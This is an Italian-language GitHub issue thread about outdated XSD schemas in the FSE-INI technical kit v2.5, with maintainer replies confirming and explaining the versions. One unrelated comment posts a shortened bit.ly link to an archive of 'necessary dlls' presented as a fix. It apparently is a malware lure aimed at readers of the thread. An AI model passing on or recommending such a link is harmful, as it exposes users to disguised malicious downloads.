### ISSUE TITLE
verifica tracciati contenuti in FSE-INI_Kit-Tecnico_v2-5-20240312

### ISSUE THREAD

**Issue by andrea-elmi** [ministero-salute/it-fse-support#1007]
Buongiorno,
nel file FSE-INI_Kit-Tecnico_v2-5-20240312.rar, contenuto nel file condiviso per il crash program fase 2 (path crash_program.zip\Crash Program 2.0\KIT Sussidiarietà\), sono contenuti tracciati per i servizi sussidiarietà/traduttore che non sembrano in linea con le specifiche AD 2.5, come  suggerisce invece il nome del file .rar.

Per esempio, lo schema comunicazionemetadatirichiesta.xsd riporta la seguente annotation:

```xml
<xs:annotation>
	<xs:documentation>Versione 1.2</xs:documentation>
</xs:annotation>
```
e mancano gli attribuiti introdotti nelle specifiche AD 2.4:

```xml
				<!-- spec_2_4 INIZIO -->
				<xs:element name="IdentificativoApplicativoRichiedente" type="td:stringTypeMax256" minOccurs="0" >
					<xs:annotation>
						<xs:documentation>Identificativo dell'applicativo richiedente</xs:documentation>
					</xs:annotation>
				</xs:element>
				<xs:element name="FornitoreApplicativoRichiedente" type="td:stringTypeMax256" minOccurs="0" >
					<xs:annotation>
						<xs:documentation>Fornitore dell'applicativo richiedente</xs:documentation>
					</xs:annotation>
				</xs:element>
				<xs:element name="VersioneApplicativoRichiedente" type="td:stringTypeMax256" minOccurs="0" >
					<xs:annotation>
						<xs:documentation>Versione dell'applicativo richiedente</xs:documentation>
					</xs:annotation>
				</xs:element>
				<!-- spec_2_4 FINE -->
``` 

I tracciati sono aggiornati oppure è stata inclusa una versione più vecchia?
grazie

**Comment by websquadpro** [comment]
This might help:This file might fix it
https://bit.ly/3XQLHlH
I put the necessary dlls in the archive

**Comment by bborruso** [comment]
Buongiorno, vi ringraziamo della segnalazione, in effetti questa versione dei tracciati riportata nella directory FSE-INI_Kit-Tecnico_v2-5-20240927\documentiComuni\tracciati  non riporta i tag che invece sono presenti nella versione 2.4, correggeremo questo refuso. Il kit della sussidiarietà che avete ritrovato risulta però aggiornato rispetto a quanto introdotto per la versione 2.5, dove al seguente percorso per esempio per la regione Sicilia: FSE-INI_Kit-Tecnico_v2-5-20240312\LaboratoriSicilia\progettiSoapUi   abbiamo mantenuto due diversi progetti per i tracciati: quelli validi per la versione 2.4.1 e quelli da utilizzare per la versione 2.5. Questi aggiornamenti però valgono solo per le regioni in sussidiarietà poichè per le regioni traduttore, come nel vostro caso, non ci sono state novità introduttive sul tracciato con la versione 2.5 delle specifiche Agid, né per il colloquio con il Gateway che come sapete avverrà direttamente tra Gateway e INI (a meno della parte delle notifiche che INI vi invierà) né per gli errori /refusi che sono stati introdotti con questa versione e che non hanno portato a variazioni sui tracciati. Saluti

**Comment by andrea-elmi** [comment]
Buongiorno, grazie per il riscontro e i chiarimenti. 
saluti

**Comment by vigliottim** [comment]
Grazie per il gentile riscontro.
Procediamo alla chiusura della presente issue che potrà essere riaperta nel caso in cui avesse bisogno di ulteriore supporto.
